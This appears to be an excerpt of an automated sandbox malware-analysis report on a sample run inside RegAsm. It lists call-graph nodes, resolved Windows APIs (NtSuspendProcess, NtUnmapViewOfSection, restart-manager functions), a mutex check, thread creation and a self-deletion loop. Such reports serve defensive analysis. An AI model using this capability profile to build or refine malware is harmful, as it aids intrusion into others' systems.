47295->47272 47302 438cf3 47296->47302 47299 438f36 InitializeCriticalSectionAndSpinCount 47300 438f22 47299->47300 47300->47282 47301->47286 47303 438d23 47302->47303 47304 438d27 47302->47304 47303->47304 47308 438d47 47303->47308 47309 438d93 47303->47309 47304->47299 47304->47300 47306 438d53 GetProcAddress 47307 438d63 __crt_fast_encode_pointer 47306->47307 47307->47304 47308->47304 47308->47306 47310 438dbb LoadLibraryExW 47309->47310 47315 438db0 47309->47315 47311 438dd7 GetLastError 47310->47311 47314 438def 47310->47314 47312 438de2 LoadLibraryExW 47311->47312 47311->47314 47312->47314 47313 438e06 FreeLibrary 47313->47315 47314->47313 47314->47315 47315->47303 47317 438cf3 try_get_function 5 API calls 47316->47317 47318 438e2e 47317->47318 47319 438e46 TlsAlloc 47318->47319 47320 438e37 47318->47320 47320->47289 47321->47292 47322->47290 47326 44fc01 47323->47326 47324 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47325 43464e 47324->47325 47325->46969 47325->47280 47326->47324 47328 434bb8 GetStartupInfoW 47327->47328 47328->46982 47330 44f0e2 47329->47330 47332 44f0eb 47329->47332 47334 44efd8 47330->47334 47332->46985 47333->46985 47354 448295 GetLastError 47334->47354 47336 44efe5 47375 44f0f7 47336->47375 47338 44efed 47384 44ed6c 47338->47384 47341 44f004 47341->47332 47344 44f047 47409 446802 20 API calls __dosmaperr 47344->47409 47348 44f042 47408 44062d 20 API calls __dosmaperr 47348->47408 47350 44f08b 47350->47344 47411 44ec42 20 API calls 47350->47411 47351 44f05f 47351->47350 47410 446802 20 API calls __dosmaperr 47351->47410 47355 4482b7 47354->47355 47356 4482ab 47354->47356 47413 445b74 20 API calls 3 library calls 47355->47413 47412 44883c 11 API calls 2 library calls 47356->47412 47359 4482b1 47359->47355 47361 448300 SetLastError 47359->47361 47360 4482c3 47366 4482cb 47360->47366 47415 448892 11 API calls 2 library calls 47360->47415 47361->47336 47364 4482e0 47364->47366 47367 4482e7 47364->47367 47365 4482d1 47368 44830c SetLastError 47365->47368 47414 446802 20 API calls __dosmaperr 47366->47414 47416 448107 20 API calls __dosmaperr 47367->47416 47418 446175 35 API calls _abort 47368->47418 47371 4482f2 47417 446802 20 API calls __dosmaperr 47371->47417 47374 4482f9 47374->47361 47374->47368 47376 44f103 CallCatchBlock 47375->47376 47377 448295 _abort 35 API calls 47376->47377 47379 44f10d 47377->47379 47380 44f191 CallCatchBlock 47379->47380 47419 446175 35 API calls _abort 47379->47419 47420 445909 EnterCriticalSection 47379->47420 47421 446802 20 API calls __dosmaperr 47379->47421 47422 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 47379->47422 47380->47338 47423 43a837 47384->47423 47387 44ed8d GetOEMCP 47389 44edb6 47387->47389 47388 44ed9f 47388->47389 47390 44eda4 GetACP 47388->47390 47389->47341 47391 4461b8 47389->47391 47390->47389 47392 4461f6 47391->47392 47397 4461c6 __Getctype 47391->47397 47434 44062d 20 API calls __dosmaperr 47392->47434 47394 4461e1 RtlAllocateHeap 47395 4461f4 47394->47395 47394->47397 47395->47344 47398 44f199 47395->47398 47397->47392 47397->47394 47433 443001 7 API calls 2 library calls 47397->47433 47399 44ed6c 37 API calls 47398->47399 47400 44f1b8 47399->47400 47403 44f209 IsValidCodePage 47400->47403 47405 44f1bf 47400->47405 47407 44f22e ___scrt_fastfail 47400->47407 47401 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47402 44f03a 47401->47402 47402->47348 47402->47351 47404 44f21b GetCPInfo 47403->47404 47403->47405 47404->47405 47404->47407 47405->47401 47435 44ee44 GetCPInfo 47407->47435 47408->47344 47409->47341 47410->47350 47411->47344 47412->47359 47413->47360 47414->47365 47415->47364 47416->47371 47417->47374 47420->47379 47421->47379 47422->47379 47424 43a854 47423->47424 47425 43a84a 47423->47425 47424->47425 47426 448295 _abort 35 API calls 47424->47426 47425->47387 47425->47388 47427 43a875 47426->47427 47431 4483e4 35 API calls __Toupper 47427->47431 47429 43a88e 47432 448411 35 API calls __cftof 47429->47432 47431->47429 47432->47425 47433->47397 47434->47395 47439 44ee7e 47435->47439 47444 44ef28 47435->47444 47438 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47441 44efd4 47438->47441 47445 4511ac 47439->47445 47441->47405 47443 44aee6 _swprintf 40 API calls 47443->47444 47444->47438 47446 43a837 __cftof 35 API calls 47445->47446 47447 4511cc MultiByteToWideChar 47446->47447 47449 45120a 47447->47449 47457 4512a2 47447->47457 47451 45122b __alloca_probe_16 ___scrt_fastfail 47449->47451 47452 4461b8 ___crtLCMapStringA 21 API calls 47449->47452 47450 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47453 44eedf 47450->47453 47454 45129c 47451->47454 47456 451270 MultiByteToWideChar 47451->47456 47452->47451 47459 44aee6 47453->47459 47464 435ecd 20 API calls _free 47454->47464 47456->47454 47458 45128c GetStringTypeW 47456->47458 47457->47450 47458->47454 47460 43a837 __cftof 35 API calls 47459->47460 47461 44aef9 47460->47461 47465 44acc9 47461->47465 47464->47457 47466 44ace4 ___crtLCMapStringA 47465->47466 47467 44ad0a MultiByteToWideChar 47466->47467 47468 44ad34 47467->47468 47478 44aebe 47467->47478 47469 44ad55 __alloca_probe_16 47468->47469 47473 4461b8 ___crtLCMapStringA 21 API calls 47468->47473 47472 44ad9e MultiByteToWideChar 47469->47472 47487 44ae0a 47469->47487 47470 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47471 44aed1 47470->47471 47471->47443 47474 44adb7 47472->47474 47472->47487 47473->47469 47492 448c33 47474->47492 47478->47470 47479 44ade1 47482 448c33 _swprintf 11 API calls 47479->47482 47479->47487 47480 44ae19 47481 4461b8 ___crtLCMapStringA 21 API calls 47480->47481 47485 44ae3a __alloca_probe_16 47480->47485 47481->47485 47482->47487 47483 44aeaf 47500 435ecd 20 API calls _free 47483->47500 47485->47483 47486 448c33 _swprintf 11 API calls 47485->47486 47488 44ae8e 47486->47488 47501 435ecd 20 API calls _free 47487->47501 47488->47483 47489 44ae9d WideCharToMultiByte 47488->47489 47489->47483 47490 44aedd 47489->47490 47502 435ecd 20 API calls _free 47490->47502 47493 44854a __dosmaperr 5 API calls 47492->47493 47494 448c5a 47493->47494 47498 448c63 47494->47498 47503 448cbb 10 API calls 3 library calls 47494->47503 47496 448ca3 LCMapStringW 47496->47498 47497 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47499 448cb5 47497->47499 47498->47497 47499->47479 47499->47480 47499->47487 47500->47487 47501->47478 47502->47487 47503->47496 47505 41cc20 LoadLibraryA GetProcAddress 47504->47505 47506 41cc10 GetModuleHandleA GetProcAddress 47504->47506 47507 41cc49 44 API calls 47505->47507 47508 41cc39 LoadLibraryA GetProcAddress 47505->47508 47506->47505 47507->46990 47508->47507 47686 41b539 FindResourceA 47509->47686 47513 40f428 ctype 47696 4020b7 47513->47696 47516 401fe2 28 API calls 47517 40f44e 47516->47517 47518 401fd8 11 API calls 47517->47518 47519 40f457 47518->47519 47520 43bda0 new 21 API calls 47519->47520 47521 40f468 ctype 47520->47521 47702 406e13 47521->47702 47523 40f49b 47523->46992 47525 40210c 47524->47525 47526 4023ce 11 API calls 47525->47526 47527 402126 47526->47527 47528 402569 28 API calls 47527->47528 47529 402134 47528->47529 47529->46995 47739 4020df 47530->47739 47532 41bebf 47536 41bf31 47532->47536 47543 401fe2 28 API calls 47532->47543 47547 401fd8 11 API calls 47532->47547 47551 41bf2f 47532->47551 47743 4041a2 28 API calls 47532->47743 47744 41cec5 47532->47744 47533 401fd8 11 API calls 47534 41bf61 47533->47534 47535 401fd8 11 API calls 47534->47535 47538 41bf69 47535->47538 47755 4041a2 28 API calls 47536->47755 47540 401fd8 11 API calls 47538->47540 47544 40ea5f 47540->47544 47541 41bf3d 47542 401fe2 28 API calls 47541->47542 47545 41bf46 47542->47545 47543->47532 47552 40fb52 47544->47552 47546 401fd8 11 API calls 47545->47546 47548 41bf4e 47546->47548 47547->47532 47549 41cec5 28 API calls 47548->47549 47549->47551 47551->47533 47553 40fb5e 47552->47553 47555 40fb65 47552->47555 47781 402163 11 API calls 47553->47781 47555->47000 47557 402163 47556->47557 47561 40219f 47557->47561 47782 402730 11 API calls 47557->47782 47559 402184 47783 402712 11 API calls std::_Deallocate 47559->47783 47561->47002 47562->47007 47563->47012 47564->47015 47565->47020 47567 401ff1 47566->47567 47574 402039 47566->47574 47568 4023ce 11 API calls 47567->47568 47569 401ffa 47568->47569 47570 402015 47569->47570 47571 40203c 47569->47571 47784 403098 28 API calls 47570->47784 47785 40267a 11 API calls 47571->47785 47575 401fd8 47574->47575 47576 4023ce 11 API calls 47575->47576 47577 401fe1 47576->47577 47577->47027 47578->47031 47579->47033 47580->47035 47581->47037 47582->47044 47786 401fab 47583->47786 47585 40d0ae CreateMutexA GetLastError 47585->47049 47586->47008 47587->47010 47588->47016 47589->47019 47591->47041 47592->47054 47593->47057 47594->47045 47595->47055 47596->47065 47597->47074 47598->47067 47599->47081 47600->47058 47601->47064 47602->47073 47603->47079 47604->47082 47605->47087 47606->47092 47607->47096 47608->47102 47609->47104 47610->47106 47611->47114 47612->47119 47613->47124 47614->47131 47615->47135 47616->47139 47617->47112 47618->47118 47619->47123 47620->47128 47621->47136 47622->47140 47623->47144 47624->47151 47625->47155 47626->47160 47627->47164 47628->47125 47629->47129 47630->47137 47631->47145 47632->47147 47633->47150 47634->47156 47635->47159 47636->47163 47637->47167 47638->47169 47639->47171 47640->47173 47641->47175 47642->47177 47643->47179 47644->47181 47645->47183 47646->47186 47647->47188 47654 434563 47648->47654 47649 43bda0 new 21 API calls 47649->47654 47650 40f10c 47655 401e65 22 API calls 47650->47655 47654->47649 47654->47650 47787 443001 7 API calls 2 library calls 47654->47787 47788 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47654->47788 47789 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47654->47789 47655->47194 47656->47196 47657->47202 47658->47204 47659->47208 47660->47213 47661->47222 47662->47227 47663->47234 47664->47210 47665->47216 47666->47224 47667->47235 47668->47209 47669->47215 47670->47218 47671->47223 47672->47239 47674->47243 47675->47247 47676->47252 47677->47256 47678->47063 47680->47078 47681->47086 47682->47091 47683->47095 47684->47098 47790 41ada8 104 API calls 47685->47790 47687 41b556 LoadResource LockResource SizeofResource 47686->47687 47688 40f419 47686->47688 47687->47688 47689 43bda0 47688->47689 47694 4461b8 __Getctype 47689->47694 47690 4461f6 47706 44062d 20 API calls __dosmaperr 47690->47706 47692 4461e1 RtlAllocateHeap 47693 4461f4 47692->47693 47692->47694 47693->47513 47694->47690 47694->47692 47705 443001 7 API calls 2 library calls 47694->47705 47697 4020bf 47696->47697 47707 4023ce 47697->47707 47699 4020ca 47711 40250a 47699->47711 47701 4020d9 47701->47516 47703 4020b7 28 API calls 47702->47703 47704 406e27 47703->47704 47704->47523 47705->47694 47706->47693 47708 402428 47707->47708 47709 4023d8 47707->47709 47708->47699 47709->47708 47718 4027a7 11 API calls std::_Deallocate 47709->47718 47712 40251a 47711->47712 47713 402535 47712->47713 47715 402520 47712->47715 47729 4028e8 28 API calls 47713->47729 47719 402569 47715->47719 47717 402533 47717->47701 47718->47708 47730 402888 47719->47730 47721 40257d 47722 402592 47721->47722 47723 4025a7 47721->47723 47735 402a34 22 API calls 47722->47735 47737 4028e8 28 API calls 47723->47737 47726 40259b 47736 4029da 22 API calls 47726->47736 47728 4025a5 47728->47717 47729->47717 47731 402890 47730->47731 47732 402898 47731->47732 47738 402ca3 22 API calls 47731->47738 47732->47721 47735->47726 47736->47728 47737->47728 47740 4020e7 47739->47740 47741 4023ce 11 API calls 47740->47741 47742 4020f2 47741->47742 47742->47532 47743->47532 47745 41ced2 47744->47745 47746 41cf31 47745->47746 47750 41cee2 47745->47750 47747 41cf4b 47746->47747 47748 41d071 28 API calls 47746->47748 47765 41d1d7 28 API calls 47747->47765 47748->47747 47751 41cf1a 47750->47751 47756 41d071 47750->47756 47764 41d1d7 28 API calls 47751->47764 47752 41cf2d 47752->47532 47755->47541 47758 41d079 47756->47758 47757 41d0ab 47757->47751 47758->47757 47759 41d0af 47758->47759 47762 41d093 47758->47762 47776 402725 22 API calls 47759->47776 47766 41d0e2 47762->47766 47764->47752 47765->47752 47767 41d0ec __EH_prolog 47766->47767 47777 402717 22 API calls 47767->47777 47769 41d0ff 47778 41d1ee 11 API calls 47769->47778 47771 41d125 47772 41d15d 47771->47772 47779 402730 11 API calls 47771->47779 47772->47757 47774 41d144 47780 402712 11 API calls std::_Deallocate 47774->47780 47777->47769 47778->47771 47779->47774 47780->47772 47781->47555 47782->47559 47783->47561 47784->47574 47785->47574 47787->47654 47798 412829 61 API calls 47796->47798 47800 443248 _abort 47799->47800 47801 443396 _abort GetModuleHandleW 47800->47801 47809 443260 47800->47809 47803 443254 47801->47803 47803->47809 47833 4433da GetModuleHandleExW 47803->47833 47804 443306 47822 443346 47804->47822 47808 4432dd 47812 4432f5 47808->47812 47816 444276 _abort 5 API calls 47808->47816 47821 445909 EnterCriticalSection 47809->47821 47810 443323 47825 443355 47810->47825 47811 44334f 47842 4577a9 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47811->47842 47817 444276 _abort 5 API calls 47812->47817 47816->47812 47817->47804 47818 443268 47818->47804 47818->47808 47841 443ff0 20 API calls _abort 47818->47841 47821->47818 47843 445951 LeaveCriticalSection 47822->47843 47824 44331f 47824->47810 47824->47811 47844 448d49 47825->47844 47828 443383 47831 4433da _abort 8 API calls 47828->47831 47829 443363 GetPEB 47829->47828 47830 443373 GetCurrentProcess TerminateProcess 47829->47830 47830->47828 47832 44338b ExitProcess 47831->47832 47834 443404 GetProcAddress 47833->47834 47835 443427 47833->47835 47836 443419 47834->47836 47837 443436 47835->47837 47838 44342d FreeLibrary 47835->47838 47836->47835 47839 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47837->47839 47838->47837 47840 443440 47839->47840 47840->47809 47841->47808 47843->47824 47845 448d64 47844->47845 47846 448d6e 47844->47846 47848 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47845->47848 47847 44854a __dosmaperr 5 API calls 47846->47847 47847->47845 47849 44335f 47848->47849 47849->47828 47849->47829 47850 4458c8 47851 4458d3 47850->47851 47853 4458fc 47851->47853 47854 4458f8 47851->47854 47856 448b04 47851->47856 47863 445920 DeleteCriticalSection 47853->47863 47857 44854a __dosmaperr 5 API calls 47856->47857 47858 448b2b 47857->47858 47859 448b49 InitializeCriticalSectionAndSpinCount 47858->47859 47860 448b34 47858->47860 47859->47860 47861 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47860->47861 47862 448b60 47861->47862 47862->47851 47863->47854 47864 40165e 47865 401666 47864->47865 47866 401669 47864->47866 47867 4016a8 47866->47867 47869 401696 47866->47869 47868 43455e new 22 API calls 47867->47868 47870 40169c 47868->47870 47871 43455e new 22 API calls 47869->47871 47871->47870

                                                        Executed Functions

                                                        Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                        • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                        • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                        • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                        • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                        • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad$HandleModule
                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                        • API String ID: 4236061018-3687161714
                                                        • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                        • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                        • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                        • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                        Function 00443355 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 530 443355-443361 call 448d49 533 443383-44338f call 4433da ExitProcess 530->533 534 443363-443371 GetPEB 530->534 534->533 535 443373-44337d GetCurrentProcess TerminateProcess 534->535 535->533
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
                                                        • TerminateProcess.KERNEL32(00000000), ref: 0044337D
                                                        • ExitProcess.KERNEL32 ref: 0044338F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID: PkGNG
                                                        • API String ID: 1703294689-263838557
                                                        • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                        • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                        • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                        • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                        Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                        • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                        • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                        • Instruction Fuzzy Hash:
                                                        Function 0040EA00 Relevance: 84.8, APIs: 14, Strings: 34, Instructions: 795COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e call 40d0a4 70->80 79->80 98 40ec27-40ec3d call 401fab call 4139e4 79->98 87 40ec43-40ec45 80->87 90 40ec47-40ec49 87->90 91 40ec4e-40ec55 87->91 92 40ef2c 90->92 93 40ec57 91->93 94 40ec59-40ec65 call 41b354 91->94 92->49 93->94 103 40ec67-40ec69 94->103 104 40ec6e-40ec72 94->104 98->80 124 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->124 103->104 108 40ecb1-40ecc4 call 401e65 call 401fab 104->108 109 40ec74-40ec7b call 407751 104->109 129 40ecc6 call 407790 108->129 130 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->130 121 40ec87-40ec9a call 401e65 call 401fab 109->121 122 40ec7d-40ec82 call 407773 call 40729b 109->122 121->108 141 40ec9c-40eca2 121->141 122->121 157 40f3e0-40f3ea call 40dd7d call 414f65 124->157 129->130 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 130->177 178 40edbb-40edbf 130->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 202 40ed70-40ed74 call 401e65 177->202 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 233 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->233 182 40ee4a-40ee54 call 409092 180->182 183 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->183 192 40ee59-40ee7d call 40247c call 434829 182->192 183->192 210 40ee8c 192->210 211 40ee7f-40ee8a call 436f10 192->211 212 40ed79-40edb6 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 202->212 216 40ee8e-40ef03 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 call 434832 call 401e65 call 40b9f8 210->216 211->216 212->178 216->233 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 216->288 286 40f017-40f019 233->286 287 40effc 233->287 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->233 305 40ef2a 288->305 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 305->92 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 356 40f194-40f1a7 call 401e65 call 401fab 347->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->357 368 40f207-40f21a call 401e65 call 401fab 356->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->369 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 400 40f27b 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f322 call 401fab call 41353a 413->416 415->418 416->157 428 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 416->428 418->416 443 40f381-40f386 DeleteFileW 428->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->124 445->124 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                        APIs
